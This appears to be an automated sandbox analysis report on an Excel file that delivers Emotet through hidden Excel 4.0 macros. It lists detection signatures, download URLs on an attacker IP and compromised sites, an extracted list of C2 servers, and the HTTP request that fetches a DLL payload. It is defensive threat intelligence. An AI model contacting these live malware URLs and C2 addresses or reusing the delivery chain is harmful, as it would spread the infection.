Windows Analysis Report
364453688149503140239183.xls

Overview

General Information

Sample Name: 364453688149503140239183.xls
Analysis ID: 562430
MD5: 4097bbda61bfb39067eab29fb342e34e
SHA1: ca13a07a1eb59e7b30f217239a0db63235354c49
SHA256: 4d876f4afaf9df30d8b9ecaeddd86defa6dedd94dcaa933d67fe578b9cabdc18
Tags: SilentBuilderxls

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Obfuscated command line found
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection

Source: http://91.240.118.168/vvv/ppp/fe.htmlWinSta0 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe Avira URL Cloud: Label: malware
Source: http://cmit.valestudios.com/wp-admin/RueGJ41A/ Avira URL Cloud: Label: malware
Source: http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/ Avira URL Cloud: Label: phishing
Source: http://91.240.118.168/vvv/ppp/fe.htmlv1.0 Avira URL Cloud: Label: malware
Source: http://bawelnianka.cfolks.pl/wp-content/Ttv/ Avira URL Cloud: Label: phishing
Source: http://ayoobeducationaltrust.in Avira URL Cloud: Label: phishing
Source: http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.pngPE3 Avira URL Cloud: Label: malware
Source: http://cmit.valestudios.com/wp-a Avira URL Cloud: Label: malware
Source: http://thesocialagent.net/b/MO5AKqJ9Ty9lE/PE3 Avira URL Cloud: Label: malware
Source: http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.htmlmshta Avira URL Cloud: Label: malware
Source: http://test.valestudios.com/wp-c Avira URL Cloud: Label: malware
Source: http://crm.compracasaenhouston.com/hs4d8a/c0s13I/PE3 Avira URL Cloud: Label: phishing
Source: http://thesocialagent.net/b/MO5AKqJ9Ty9lE/ Avira URL Cloud: Label: malware
Source: http://sellin.app/wp-admin/S2cDPYXNKEnT/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.png Avira URL Cloud: Label: malware
Source: http://test.dreamcityorlando.com Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.htmlC: Avira URL Cloud: Label: malware
Source: http://curvygirlsboutique.com/jf Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.html3 Avira URL Cloud: Label: malware
Source: http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/PE3 Avira URL Cloud: Label: malware
Source: http://bawelnianka.cfolks.pl/wp-content/Ttv/PE3 Avira URL Cloud: Label: phishing
Source: http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.htmlhttp://91.240.118.168/vvv/ppp/fe.html Avira URL Cloud: Label: malware
Source: http://crm.compracasaenhouston.com/hs4d8a/c0s13I/ Avira URL Cloud: Label: phishing
Source: http://91.240.118.168 URL Reputation: Label: malware
Source: 11.2.rundll32.exe.200000.1.unpack Malware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
Source: 364453688149503140239183.xls ReversingLabs: Detection: 18%
Source: ayoobeducationaltrust.in Virustotal: Detection: 9%
Source: http://cmit.valestudios.com/wp-admin/RueGJ41A/ Virustotal: Detection: 12%
Source: C:\ProgramData\QWER.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 91.240.118.168:80
Source: global traffic DNS query: name: ayoobeducationaltrust.in

Networking

Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.168:80
Source: global traffic HTTP traffic detected: GET /vvv/ppp/fe.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cms/LmOOeDnNo0dh4vkN/ HTTP/1.1Host: ayoobeducationaltrust.inConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 20:28:51 GMTServer: ApacheSet-Cookie: 61f4520308e3e=1643401731; expires=Fri, 28-Jan-2022 20:29:51 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 20:28:51 GMTExpires: Fri, 28 Jan 2022 20:28:51 GMTContent-Disposition: attachment; filename="xfm.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Ascii: MZ
Source: global traffic HTTP traffic detected: GET /vvv/ppp/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
Source: Joe Sandbox View ASN Name: OnlineSASFR
Source: Joe Sandbox View ASN Name: S-NET-ASPL
Source: Joe Sandbox View IP Address: 195.154.133.20
Source: Joe Sandbox View IP Address: 185.157.82.211
Source: unknown Network traffic detected: IP country count 22
Source: 364453688149503140239183.xls.0.dr String found in binary or memory: http://91.2
Source: powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168
Source: powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe
Source: mshta.exe, 00000004.00000002.448998828.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448869103.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424683366.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424658641.0000000000578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448904152.000000000053B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447450916.0000000000597000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424268800.0000000003400000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.html
Source: mshta.exe, 00000004.00000003.447483240.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448998828.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424683366.00000000005B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.html17
Source: mshta.exe, 00000004.00000003.447334668.0000000000536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447356395.000000000053E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448911645.0000000000542000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.html3
Source: mshta.exe, 00000004.00000002.448978311.0000000000598000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424658641.0000000000578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447450916.0000000000597000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.htmlC:
Source: mshta.exe, 00000004.00000002.448869103.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.htmlWinSta0
Source: mshta.exe, 00000004.00000003.426307315.000000000320D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.htmlfunction
Source: mshta.exe, 00000004.00000003.426086113.0000000003205000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.htmlhttp://91.240.118.168/vvv/ppp/fe.html
Source: mshta.exe, 00000004.00000002.448869103.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.htmlmshta
Source: mshta.exe, 00000004.00000003.447483240.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448998828.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424683366.00000000005B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.htmlv1.0
Source: powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.690418906.000000001B4AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.png
Source: powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.pngPE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ayoobeducationaltrust.in
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ayoobeducationaltrust.in/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bawelnianka.cfolks.pl/wp-
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bawelnianka.cfolks.pl/wp-content/Ttv/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bawelnianka.cfolks.pl/wp-content/Ttv/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cmit.vale
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cmit.valestudios.com/wp-a
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cmit.valestudios.com/wp-admin/RueGJ41A/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cmit.valestudios.com/wp-admin/RueGJ41A/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crm.compr
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crm.compracasaenhouston.c
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crm.compracasaenhouston.com/hs4d8a/c0s13I/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crm.compracasaenhouston.com/hs4d8a/c0s13I/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://curvygirlsboutique.com/jf
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://huculek.f
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://huculek.futurehost.pl/ima
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://huculek.futurehost.pl/images/6Dbbmo6xEQDD/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://huculek.futurehost.pl/images/6Dbbmo6xEQDD/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://lynsmithgroup.com/hftm2i2
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://lynsmithgroup.com/hftm2i2/KZIFwjmwWI1sy/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://lynsmithgroup.com/hftm2i2/KZIFwjmwWI1sy/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sellin.ap
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sellin.app/wp-admin/S2cDP
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sellin.app/wp-admin/S2cDPYXNKEnT/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sellin.app/wp-admin/S2cDPYXNKEnT/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://test.drea
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://test.dreamcityorlando.com
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://test.dreamcityorlando.com/t0mmx/xBBXi/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://test.dreamcityorlando.com/t0mmx/xBBXi/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://test.vale
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://test.valestudios.com/wp-c
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://thesocialagent.net/b/MO5A
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://thesocialagent.net/b/MO5AKqJ9Ty9lE/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://thesocialagent.net/b/MO5AKqJ9Ty9lE/PE3
Source: powershell.exe, 00000006.00000002.679285787.00000000000B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000006.00000002.679285787.00000000000B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000004.00000003.424599420.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424268800.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447384053.00000000033C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com
Source: mshta.exe, 00000004.00000003.424245582.000000000346D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.449466418.0000000003EAB000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424110567.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424721967.0000000003407000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.444232743.000000000346D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.449284684.000000000340B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.449350682.000000000346D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.425017595.0000000003408000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424268800.0000000003400000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/
Source: rundll32.exe, 00000011.00000002.679244747.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/gYIhzp
Source: rundll32.exe, 00000011.00000002.679244747.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/gYIhzpA
Source: rundll32.exe, 00000011.00000002.679438448.00000000006D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/gYIhzpB
Source: rundll32.exe, 00000011.00000002.679438448.00000000006D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/gYIhzpH
Source: rundll32.exe, 00000011.00000002.679244747.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/gYIhzpK
Source: rundll32.exe, 00000011.00000002.679438448.00000000006D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/gYIhzpz
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm
Source: unknown DNS traffic detected: queries for: ayoobeducationaltrust.in
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv, 9_2_10012C30
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: mshta.exe, 00000004.00000003.424627198.000000000054C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448920352.000000000054C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000003.424627198.000000000054C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448920352.000000000054C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 9_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 11_2_1001B43F
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud

Source: Yara match File source: 12.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e90000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2850000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.380000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a30000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.b20000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2520000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.cc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.bd0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e00000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3020000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a30000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a30000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.b80000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2860000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2f40000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.470000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2c90000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f60000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.24f0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.25e0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.440000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2dd0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.24f0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.380000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.30b0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.ac0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2c60000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.b20000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.bd0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d00000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b10000.6.raw.unpack, type: UNPACKEDPE
